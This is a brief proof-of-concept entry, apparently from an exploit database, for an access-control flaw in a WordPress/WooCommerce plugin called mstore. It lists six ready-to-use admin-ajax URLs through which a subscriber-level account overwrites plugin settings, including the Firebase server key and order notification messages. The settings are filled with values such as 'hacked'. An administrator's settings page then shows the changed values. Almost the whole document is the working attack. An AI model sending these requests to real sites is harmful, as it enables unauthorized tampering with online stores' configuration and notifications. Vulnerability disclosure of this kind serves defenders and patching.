## https://sploitus.com/exploit?id=WPEX-ID:970735F1-24BB-441C-89B6-5A0959246D6C
Make sure the site also has WooCommerce installed and activated, then, while logged-in as a subscriber, visit the following URLs:
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_limit_product&limit=99
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_firebase_server_key&serverKey=hacked
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_title&title=1337
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_message&message=hacked+message
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_title&title=1338
- http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_message&message=hacked+message
Then, while logged-in as an administrator, visit /wp-admin/admin.php?page=mstore-plugin, and notice how the attacks have changed all the values.